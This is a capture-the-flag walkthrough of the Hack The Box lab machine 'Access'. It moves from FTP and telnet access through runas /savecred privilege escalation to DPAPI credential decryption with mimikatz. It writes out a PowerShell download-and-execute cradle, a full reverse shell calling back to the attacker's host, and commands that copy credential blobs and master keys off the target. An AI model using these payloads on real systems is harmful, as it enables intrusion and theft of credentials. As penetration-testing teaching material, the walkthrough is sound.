Enumeration
Defining a helper variable containing the IP and doing some basic enumeration:
```sh
export ip=10.10.10.98
ping $ip          # ttl 127
nmap -sC -sV $ip -p-
```
| Port | Service | Notes |
|---|---|---|
| 21 | ftp | Microsoft ftpd, anonymous login allowed |
| 23 | telnet? | |
| 80 | http | Microsoft IIS httpd 7.5, MegaCorp, TRACE enabled |

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Ftp
Anonymous login is allowed, so getting in is easy:
```sh
ftp $ip            # anonymous / no password
cd Backups
type binary        # switch to binary mode before transferring
get backup.mdb
cd ../Engineer
get "Access Control.zip"
```
backup.mdb appears to be a Microsoft Access database. Trying mdbtools to open it:
```sh
mdb-tables backup.mdb | grep user
mdb-export backup.mdb auth_user
```
Returns:
| id | username | password | Status | last_login | RoleID | Remark |
|---|---|---|---|---|---|---|
| 25 | "admin" | "admin" | 1 | "08/23/18 21:11:47" | 26 | |
| 27 | "engineer" | "access4u@security" | 1 | "08/23/18 21:13:36" | 26 | |
| 28 | "backup_admin" | "admin" | 1 | "08/23/18 21:14:02" | 26 | |
Trying these passwords against Access Control.zip, the engineer's password unpacks it:
```sh
7z x Access\ Control.zip -paccess4u@security
# extracts: Access Control.pst
file Access\ Control.pst
# Microsoft Outlook Personal Storage
readpst Access\ Control.pst
# produces: Access Control.mbox
cat Access\ Control.mbox
# The password for the "security" account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
```
Telnet
The credentials recovered from the mailbox work for the telnet service:
```text
telnet $ip
login: security
password: 4Cc3ssC0ntr0ller
whoami
# access\security
type Desktop\user.txt
```
Privilege Escalation
There is a shortcut on the Public desktop which shows that runas is invoked with saved credentials (`/savecred`). The same saved credential can be used to launch PowerShell as Administrator with a reverse shell payload:
```text
type ..\Public\Desktop\"ZKAccess3.5 Security System.lnk"
```
The output is binary, but the readable strings give away the shortcut's target, arguments, working directory and the SID it was created under:
```text
C:\Windows\System32\runas.exe
/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
C:\ZKTeco\ZKAccess3.5
C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico
S-1-5-21-953262931-566350628-63446256-500
```
cmdkey confirms the Administrator credential is stored for the security user:
```text
cmdkey /list
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
```
```powershell
runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.11/shell.ps1')"
```
Make a reverse shell shell.ps1:
```powershell
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.11",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
Serve it over a web server and start a listener:
```sh
sudo python -m http.server 80
nc -nvlp 4444
```
Use runas to run the reverse shell as Administrator:
```powershell
runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.11/shell.ps1')"
```
On the reverse listener:
```powershell
whoami
# access\administrator
cat C:\users\Administrator\Desktop\root.txt
```
Credential Recovery
It's possible to extract the saved credentials using the Windows Data Protection API (DPAPI). Checking the following paths:
```powershell
ls -Force C:\Users\security\AppData\Local\Microsoft\Vault
ls -Force C:\Users\security\AppData\Local\Microsoft\Credentials
ls -Force C:\Users\security\AppData\Local\Microsoft\Protect
ls -Force C:\Users\security\AppData\Roaming\Microsoft\Vault
ls -Force C:\Users\security\AppData\Roaming\Microsoft\Credentials
ls -Force C:\Users\security\AppData\Roaming\Microsoft\Protect
```
This finds hidden system files in the last two paths which are likely the saved credential blob and the master key that protects it. These can be base64-encoded for extraction and local examination:
```powershell
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\security\AppData\Roaming\Microsoft\Credentials\51AB168BE4BDB3A603DADE4F8CA81290"))
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580"))
```
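An added example (not part of the original writeup): parsing the credential file's header in Python to read off which master key GUID protects it, which is how an analyst confirms that the Protect\<SID>\<guid> file fetched above is the right one. The sample bytes are the first 126 bytes of the page's own base64; the field layout is the documented CREDENTIAL file / DPAPI_BLOB structure.

```python
import base64
import struct
import uuid

# Every CryptProtectData blob carries this well-known provider GUID.
DPAPI_PROVIDER_GUID = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"

# Leading 126 bytes of the credential file pulled from the box (the page's own
# base64, cut after dwAlgCryptLen, which is as far as this header parser reads).
CRED_FILE_PREFIX_B64 = (
    "AQAAAA4CAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALsOSB6VI40+LQ9k9ZFkFgAAAACA6AAAA"
    "RQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAABBmAAAAAQAA"
)

def parse_credential_file_header(data: bytes) -> dict:
    """Parse the CREDENTIAL file header and the leading DPAPI_BLOB fields.

    Little-endian layout: file dwVersion, dwBlobSize, dwUnknown; then blob
    dwVersion, guidProvider, dwMasterKeyVersion, guidMasterKey, dwFlags,
    dwDescriptionLen, szDescription (UTF-16LE), algCrypt, dwAlgCryptLen, ...
    """
    file_version, blob_size, _unused = struct.unpack_from("<III", data, 0)
    blob_version = struct.unpack_from("<I", data, 12)[0]
    provider = uuid.UUID(bytes_le=data[16:32])
    if str(provider) != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob, provider GUID is %s" % provider)
    mk_version = struct.unpack_from("<I", data, 32)[0]
    master_key = uuid.UUID(bytes_le=data[36:52])  # names the Protect\<SID>\<guid> file
    flags, desc_len = struct.unpack_from("<II", data, 52)
    description = data[60:60 + desc_len].decode("utf-16-le").rstrip("\x00")
    alg_crypt, key_bits = struct.unpack_from("<II", data, 60 + desc_len)
    return {
        "file_version": file_version, "blob_size": blob_size,
        "blob_version": blob_version, "master_key_version": mk_version,
        "master_key_guid": str(master_key),
        "flags": flags,          # 0x20000000 == CRYPTPROTECT_SYSTEM
        "description": description,
        "alg_crypt": alg_crypt,  # 0x6610 == CALG_AES_256
        "key_bits": key_bits,
    }

def master_key_path(user: str, sid: str, master_key_guid: str) -> str:
    """Path of the user master key the blob names, as laid out on the victim host."""
    return r"C:\Users\%s\AppData\Roaming\Microsoft\Protect\%s\%s" % (user, sid, master_key_guid)

def parse_page_sample() -> dict:
    """Parse the truncated credential file captured above."""
    return parse_credential_file_header(base64.b64decode(CRED_FILE_PREFIX_B64))
```

Running parse_page_sample() on the page's blob gives master key GUID 0792c32e-48a5-4fe3-8b43-d93d64590580, the very file name under Protect\<SID> that was fetched above, with description "Enterprise Credential Data" and AES-256 as the cipher.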
On a Windows machine we control, fetch mimikatz, write the two files back to disk from the captured base64, then start mimikatz:
```powershell
winget install Git.Git
git clone https://github.com/ParrotSec/mimikatz
cd mimikatz\x64
# credential blob
[IO.File]::WriteAllBytes("C:\Users\vm\dev\51AB168BE4BDB3A603DADE4F8CA81290",[Convert]::FromBase64String("AQAAAA4CAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALsOSB6VI40+LQ9k9ZFkFgAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAABBmAAAAAQAAIAAAAPW7usJAvZDZr308LPt/MB8fEjrJTQejzAEgOBNfpaa8AAAAAA6AAAAAAgAAIAAAAPlkLTI/rjZqT3KT0C8m5Ecq3DKwC6xqBhkURY2t/T5SAAEAAOc1Qv9x0IUp+dpf+I7c1b5E0RycAsRf39nuWlMWKMsPno3CIetbTYOoV6/xNHMTHJJ1JyF/4XfgjWOmPrXOU0FXazMzKAbgYjY+WHhvt1Uaqi4GdrjjlX9Dzx8Rou0UnEMRBOX5PyA2SRbfJaAWjt4jeIvZ1xGSzbZhxcVobtJWyGkQV/5v4qKxdlugl57pFAwBAhDuqBrACDD3TDWhlqwfRr1p16hsqC2hX5u88cQMu+QdWNSokkr96X4qmabp8zopfvJQhAHCKaRRuRHpRpuhfXEojcbDfuJsZezIrM1LWzwMLM/K5rCnY4Sg4nxO23oOzs4q/ZiJJSME21dnu8NAAAAAY/zBU7zWC+/QdKUJjqDlUviAlWLFU5hbqocgqCjmHgW9XRy4IAcRVRoQDtO4U1mLOHW6kLaJvEgzQvv2cbicmQ=="))
# master key
[IO.File]::WriteAllBytes("C:\Users\vm\dev\0792c32e-48a5-4fe3-8b43-d93d64590580",[Convert]::FromBase64String("AgAAAAAAAAAAAAAAMAA3ADkAMgBjADMAMgBlAC0ANAA4AGEANQAtADQAZgBlADMALQA4AGIANAAzAC0AZAA5ADMAZAA2ADQANQA5ADAANQA4ADAAAAAAAAAAAAAFAAAAsAAAAAAAAACQAAAAAAAAABQAAAAAAAAAAAAAAAAAAAACAAAAnFHKTQBwjHPU+/9guV5UnvhDAAAOgAAAEGYAAOePsdmJxMzXoFKFwX+uHDGtEhD3raBRrjIDU232E+Y6DkZHyp7VFAdjfYwcwq0WsjBqq1bX0nB7DHdCLn3jnri9/MpVBEtKf4U7bwszMyE7Ww2Ax8ECH2xKwvX6N3KtvlCvf98HsODqlA1woSRdt9+Ef2FVMKk4lQEqOtnHqMOcwFktBtcUye6P40ztUGLEEgIAAABLtt2bW5ZW2Xt48RR5ZFf0+EMAAA6AAAAQZgAAD+azql3Tr0a9eofLwBYfxBrhP4cUoivLW9qG8k2VrQM2mlM1FZGF0CdnQ9DBEys1/a/60kfTxPX0MmBBPCi0Ae1w5C4BhPnoxGaKvDbrcye9LHN0ojgbTN1Op8Rl3qp1Xg9TZyRzkA24hotCgyftqgMAAADlaJYABZMbQLoN36DhGzTQ"))
.\mimikatz.exe
```
Attempting credential extraction in mimikatz: first import the credential file, then the master key (unlocked with the security user's SID and password) into the cache, before decrypting the Administrator password:
```text
# Credential file
dpapi::cred /in:C:\Users\vm\dev\51AB168BE4BDB3A603DADE4F8CA81290 /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
# Master key
dpapi::masterkey /in:C:\Users\vm\dev\0792c32e-48a5-4fe3-8b43-d93d64590580 /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
# Decrypting
dpapi::cred /in:C:\Users\vm\dev\51AB168BE4BDB3A603DADE4F8CA81290
# CredentialBlob : 55Acc3ssS3cur1ty@megacorp
```
And verifying with telnet:
```text
telnet $ip
login: Administrator
password: 55Acc3ssS3cur1ty@megacorp
```